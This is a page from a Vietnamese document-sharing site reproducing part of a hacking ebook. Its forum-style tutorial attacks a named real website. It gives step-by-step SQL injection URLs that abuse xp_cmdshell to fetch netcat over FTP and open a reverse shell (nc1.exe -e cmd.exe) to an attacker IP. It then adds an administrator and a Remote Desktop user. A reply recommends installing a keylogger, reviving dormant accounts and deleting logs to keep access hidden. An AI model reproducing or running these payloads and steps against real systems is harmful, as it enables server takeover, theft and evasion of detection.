1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 261 ppsx

6 104 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 136,6 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

open domain //Domain của bạn 2.. quit //đóng kết nối Ở trên dùng lệnh echo >ftp %3Eftp và echo >>ftp %3E%3Eftp để ghi ra file ftp ở Windows thì dùng + %26 nếu muốn chạy nhiều command tr

Trang 1

+ 1 Host có hộ trợ ftp

+ Backdoor Netcat

hxxp://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from

%20openro wset('sqloledb','server=BACKUP;uid=BUILTIN\Adminis

trators;pwd=','set%20fmtonly%20off%20select%201%20

exec%20master xp_cmdshell%20"echo%20open Domain%3Eftp %26

echo%20user%20user%20pass%3E%3Eftp %26 echo%20bin%3E%3Eftp %26 echo%20get file%3E%3Ef %26 echo quit%3E%3Ef"') sp_password

Bước này là để tạo 1 file batch chứa những lệnh của FTP có nội dung như sau:

1 open domain //Domain của bạn

2 user user pass // User và Pass Login vào FTP

3 bin //Dạng Binary (Có 2 dạng ASCII và Binary)

4 get file //Tải file về nhớ điền đẩy đủ name và ext nhé

5 quit //đóng kết nối

Ở trên dùng lệnh echo >ftp (%3Eftp) và echo >>ftp (%3E%3Eftp) để ghi ra file ftp

ở Windows thì dùng + (%26) nếu muốn chạy nhiều command trên 1 dòng

yep tiếp theo là chạy ftp để tải file netcat về

hxxp://www.darksidecreations.com/category.asp?catcode=1;select%20*%20from

%20openrow set('sqloledb','server=BACKUP;uid=BUILTIN\Administ

rators;pwd=','set%20fmtonly%20off%20select%201%20e

xec%20master xp_cmdshell%20"ftp -v -i -n -s:ftp"') sp_password

Nếu các bạn thắc mắc về ftp -v -i -n -s:ftp

thì có thể vào Run->cmd gõ ftp -h để xem hoặc xem ở dưới ^_^

Trích:

Transfers files to and from a computer running an FTP server service

(sometimes called a daemon) Ftp can be used interactively

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

-v Suppresses display of remote server responses

-n Suppresses auto-login upon initial connection

-i Turns off interactive prompting during multiple file

Trang 2

transfers

-d Enables debugging

-g Disables filename globbing (see GLOB command)

-s:filename Specifies a text file containing FTP commands; the

commands will automatically run after FTP starts

-a Use any local interface when binding data connection

-A login as anonymous

-w:buffersize Overrides the default transfer buffer size of 4096

host Specifies the host name or IP address of the remote

host to connect to

Notes:

- mget and mput commands take y/n/q for yes/no/quit

- Use Control-C to abort commands

Nếu sau khi chạy bạn được chuyển về trang chủ thì tức là đã tải file thành công nhưng nếu bạn muốn kiểm tra lại thì dùng cách sau :

hxxp://www.darksidecreations.com/category.asp?catcode=10;drop table checknc create table checknc (id int identity,result varchar(1000)) insert into checknc exec

master xp_cmdshell 'dir filename' sp_password

filename: bạn điền chính xác tên file backdoor của bạn

sau đó chạy

hxxp://www.darksidecreations.com/category.asp?catcode=10 and

1=convert(int,(select result from checknc where id=6)) sp_password

tại sao id=6 tại dỉ khi gõ dir filename thì

03/24/2006 06:54 AM 11,776 filename

nằm ở dòng thứ 6 ^_^

Có netcat rồi giờ tới bước kết nối vào shell ^_^

À trước tiên các bạn nên biết về command của netcat nhỉ ^_^

Trích:

connect to somewhere: nc [-options] hostname port[s] [ports]

listen for inbound: nc -l -p port [options] [hostname] [port]

options:

Trang 3

-d detach from console, background mode

-e prog inbound program to exec [dangerous!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12,

-h this cruft

-i secs delay interval for lines sent, ports scanned

-l listen mode, for inbound connects

-L listen harder, re-listen on socket close

-n numeric-only IP addresses, no DNS

-o file hex dump of traffic

-p port local port number

-r randomize local and remote ports

-s addr local source address

-t answer TELNET negotiation

-u UDP mode

-v verbose [use twice to be more verbose]

-w secs timeout for connects and final net reads

-z zero-I/O mode [used for scanning]

port numbers can be individual or ranges: m-n [inclusive]

Yep giờ ở máy của bạn hãy vào Run->Cmd sau đó cd tới thư mục bạn chứa netcat chạy lệnh sau

nc -l -p 1786 -vv

1786 bạn có thể thay bằng bất cứ port nào bạn muốn

Giờ chạy ở Server :

hxxp://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from

%20openro wset('sqloledb','server=BACKUP;uid=BUILTIN\Adminis

trators;pwd=','set%20fmtonly%20off%20select%201%20

exec%20master xp_cmdshell%20"nc1.exe -e cmd.exe -d 58.187.32.40 1786"') sp_password

command là nc1.exe -e cmd.exe -d 58.187.32.40 1786

nc1.exe là file netcat bạn vừa up lên server

58.187.32.40 là IP của bạn

Trang 4

1786 là port bạn vừa cho netcat chờ sẵn

-e cmd.exe thì xem ở trên ^_^

ok chạy xong quay về màn hình cmd.exe ở máy tính của bạn sẽ thấy như sau :

vậy là bạn đang ở cmd.exe của Server đấy gõ ipconfig thì biết

giờ tới tiết mục add user và đưa user vào group admin

command để chạy gồm có:

net user username password /add /domain

VD: net user elitematrix kenda4455 /add /domain

Giờ Add vào LocalGroup Administrator

net localgroup Administrators elitematrix /add

Có quyền Admin nếu muốn Remote Desktop nữa thì

net localgroup "Remote Desktop Users" /add

Mở Remote Desktop Connection ra chứ còn chờ gì nữa

Vậy là ta có toàn quyền điều khiển server ^_^

Sorry anh Neo >.< trước khi viết đã định nói rồi nhưng post đêm buồn ngủ >.< nên quên

TrickyMaster(VNISS)

Trang 5

Để hoàn thiện hơn, góp ý thêm một số chi tiết như sau :

1 Thực ra về kỹ thuật, cái này tại thời điểm hiện tại ko elite mấy đâu, cách đây 2 năm thì đúng thế

2 Điểm elite ở đây là ý tưởng Add Group Remote cho User (chỗ này xin bản quyền ý tưởng của tôi tý)

3 Nếu một Hacker có kinh nghiệm, thì sau khi hoàn tất bước trên, sẽ làm ba bước như sau :

- Nâng quyền + set pass cho các user mặc định ít bị chú ý đến như : Guest,

IWAN chú ý enable user lên nếu cần

- Cài Keylogger vô Server, hay 1 malware tương tự

- Xóa logs trước khi thoát khỏi Server

Như vậy có thể đảm bảo rằng duy trì xâm nhập được lâu dài và bảo đảm an toàn được cho Attacker

Neo(VNISS)

Javascipt Injection (bài 1)

Mọi người đã quá quen thuộc với SQL Injection Hôm nay, mình xin được giới thiệu một bài viết về Javascript Injection của tác giả: Hamid

-

Yêu cầu: kiến thức cơ bản về html code

-

Phần 1: Cơ bản về Javascript (phần này chống chỉ định: những người đã quen

thuộc với Javascipt )

Trước tiên bạn cần phải biết thẻ dùng để chạy một đoạn mã Javascript nhúng trong một trang web, đó là <script> Với Javascript, bạn dùng thẻ <script

language="javascript">, hoặc có thể là <script type=”text/javascript”> (cái này có

vẻ phổ biến nhất) Tất nhiên để kết thúc phải có </script>

Để comment trong Javascript, nghĩa là không chạy script, bạn chỉ cần thêm <! ở đầu và // > ở cuối đoạn mã

Code:

<script language=”javascript”> <! cool code here // > </script>

Ngày đăng: 04/07/2014, 12:20